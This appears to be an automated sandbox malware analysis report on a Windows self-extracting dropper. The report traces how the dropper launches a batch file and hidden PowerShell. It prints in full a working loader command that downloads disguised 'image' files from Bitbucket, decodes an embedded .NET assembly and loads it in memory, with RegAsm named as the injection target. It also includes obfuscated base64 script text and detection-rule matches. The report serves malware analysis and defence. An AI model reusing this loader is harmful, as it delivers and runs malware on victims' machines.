micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-ZOMOKYiM3v4/MCwtRSec2w=='; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://preferences.atlassian.com
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.atlassian.com/try/cloud/signup?bundle=bitbucket
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49699 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD212D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle | 0_2_00007FF6FD212D70
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD211BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx | 0_2_00007FF6FD211BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD2141B4 | 0_2_00007FF6FD2141B4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD215F80 | 0_2_00007FF6FD215F80
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD2168F0 | 0_2_00007FF6FD2168F0
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD212EDC | 0_2_00007FF6FD212EDC
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD211D10 | 0_2_00007FF6FD211D10
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD216F14 | 0_2_00007FF6FD216F14
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD21366E | 0_2_00007FF6FD21366E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD215F7E | 0_2_00007FF6FD215F7E
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD211BF4 | 0_2_00007FF6FD211BF4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFAACB425FD | 5_2_00007FFAACB425FD
        Source: nTHivMbGpg.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 3604 bytes, 1 file, at 0x2c +A "124.bat", ID 508, number 1, 1 datablock, 0x1503 compression
        Source: nTHivMbGpg.exe | Binary or memory string: OriginalFilename vs nTHivMbGpg.exe
        Source: nTHivMbGpg.exe, 00000000.00000000.1212198360.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs nTHivMbGpg.exe
        Source: nTHivMbGpg.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs nTHivMbGpg.exe
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4423
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 4423
        Source: Process Memory Space: powershell.exe PID: 3724, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 2412, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.spre.evad.winEXE@9/6@1/1
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD214838 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA | 0_2_00007FF6FD214838
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD211BF4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx | 0_2_00007FF6FD211BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD2168F0 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA | 0_2_00007FF6FD2168F0
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Code function: 0_2_00007FF6FD215F80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA | 0_2_00007FF6FD215F80
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7104:120:WilError_03
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Process created: C:\Windows\System32\cmd.exe cmd /c 124.bat
        Source: nTHivMbGpg.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
        Source: nTHivMbGpg.exe | ReversingLabs: Detection: 39%
        Source: unknown | Process created: C:\Users\user\Desktop\nTHivMbGpg.exe "C:\Users\user\Desktop\nTHivMbGpg.exe"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Process created: C:\Windows\System32\cmd.exe cmd /c 124.bat
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = '[obfuscated base64 script string omitted]'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: unknown | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Process created: C:\Windows\System32\cmd.exe cmd /c 124.bat
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell "$codigo = '[obfuscated base64 script string omitted]'
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721', 'https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.pngSoem/sdaolnwod/rgfd/wgds/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}"
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Section loaded: cabinet.dll
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Section loaded: feclient.dll
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe | Section loaded: advpack.dll
        Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: nTHivMbGpg.exe | Static PE information: Image base 0x140000000 > 0x60000000
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: nTHivMbGpg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: nTHivMbGpg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: s\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: e.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498B2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wextract.pdb source: nTHivMbGpg.exe
        Source: Binary string: wextract.pdbGCTL source: nTHivMbGpg.exe
        Source: Binary string: dows\System.Core.pdbL source: powershell.exe, 00000005.00000002.1293487049.000002714975C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1293487049.00000271497E4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbD source: powershell.exe, 00000005.00000002.1293487049.00000271497C0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.1294975015.00000271498EB000.00000004.00000020.00020000.00000000.sdmp
        Source: nTHivMbGpg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: nTHivMbGpg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: nTHivMbGpg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: nTHivMbGpg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: nTHivMbGpg.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

        Data Obfuscation

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#bgBl#Hc#XwBp#G0#YQBn#GU#Mg#u#Go#c#Bn#D8#MQ#0#DQ#Ng#x#Dc#Mg#x#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#GI#aQB0#GI#dQBj#Gs#ZQB0#C4#bwBy#Gc#LwBo#Gc#Z#Bm#Gg#Z#Bm#Gc#Z##v#HQ#ZQBz#HQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C#
#J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#